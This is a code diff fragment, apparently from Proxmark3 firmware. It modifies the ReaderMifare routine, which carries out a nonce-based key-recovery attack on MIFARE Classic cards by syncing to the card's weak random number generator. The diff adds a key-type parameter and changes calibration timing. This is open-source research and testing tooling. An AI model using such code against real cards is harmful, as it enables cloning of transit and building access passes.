uint8_t cardAUTHKEY = 0xff; // no authentication
// allow collecting up to 8 sets of nonces to allow recovery of up to 8 keys
#define ATTACK_KEY_COUNT 8 // keep same as define in cmdhfmf.c -> readerAttack()
- nonces_t ar_nr_resp[ATTACK_KEY_COUNT*2]; //*2 for 2 separate attack types (nml, moebius)
+ nonces_t ar_nr_resp[ATTACK_KEY_COUNT*2]; // for 2 separate attack types (nml, moebius)
memset(ar_nr_resp, 0x00, sizeof(ar_nr_resp));
- uint8_t ar_nr_collected[ATTACK_KEY_COUNT*2]; //*2 for 2nd attack type (moebius)
+ uint8_t ar_nr_collected[ATTACK_KEY_COUNT*2]; // for 2nd attack type (moebius)
memset(ar_nr_collected, 0x00, sizeof(ar_nr_collected));
uint8_t nonce1_count = 0;
uint8_t nonce2_count = 0;
// Cloning MiFare Classic Rail and Building Passes, Anywhere, Anytime"
// (article by Nicolas T. Courtois, 2009)
//-----------------------------------------------------------------------------
-void ReaderMifare(bool first_try, uint8_t block ) {
- uint8_t mf_auth[] = { MIFARE_AUTH_KEYA, block, 0x00, 0x00 };
+void ReaderMifare(bool first_try, uint8_t block, uint8_t keytype ) {
+
+ uint8_t mf_auth[] = { keytype, block, 0x00, 0x00 };
uint8_t mf_nr_ar[] = { 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 };
uint8_t uid[10] = {0,0,0,0,0,0,0,0,0,0};
uint8_t par_list[8] = {0,0,0,0,0,0,0,0};
#define PRNG_SEQUENCE_LENGTH (1 << 16)
#define MAX_UNEXPECTED_RANDOM 4 // maximum number of unexpected (i.e. real) random numbers when trying to sync. Then give up.
#define MAX_SYNC_TRIES 32
-
+
+ AppendCrc14443a(mf_auth, 2);
+
BigBuf_free(); BigBuf_Clear_ext(false);
clear_trace();
set_tracing(TRUE);
iso14443a_setup(FPGA_HF_ISO14443A_READER_MOD);
- AppendCrc14443a(mf_auth, 2);
-
- if (first_try) {
- sync_time = GetCountSspClk() & 0xfffffff8;
- sync_cycles = PRNG_SEQUENCE_LENGTH + 1130; //65536; //0x10000 // Mifare Classic's random generator repeats every 2^16 cycles (and so do the nonces).
+ sync_time = GetCountSspClk() & 0xfffffff8;
+ // iceman, i add 1130 because during my observations this makse the syncronization much fast to sync.
+ sync_cycles = PRNG_SEQUENCE_LENGTH + 1130; //65536; // Mifare Classic's random generator repeats every 2^16 cycles (and so do the nonces).
+
+ if (first_try) {
mf_nr_ar3 = 0;
nt_attacked = 0;
par_low = 0;
WDT_HIT();
LED_B_ON();
- if (first_try && previous_nt && !nt_attacked) { // we didn't calibrate our clock yet
+ // we didn't calibrate our clock yet,
+ // iceman: has to be calibrated every time.
+ if (previous_nt && !nt_attacked) {
nt_distance = dist_nt(previous_nt, nt);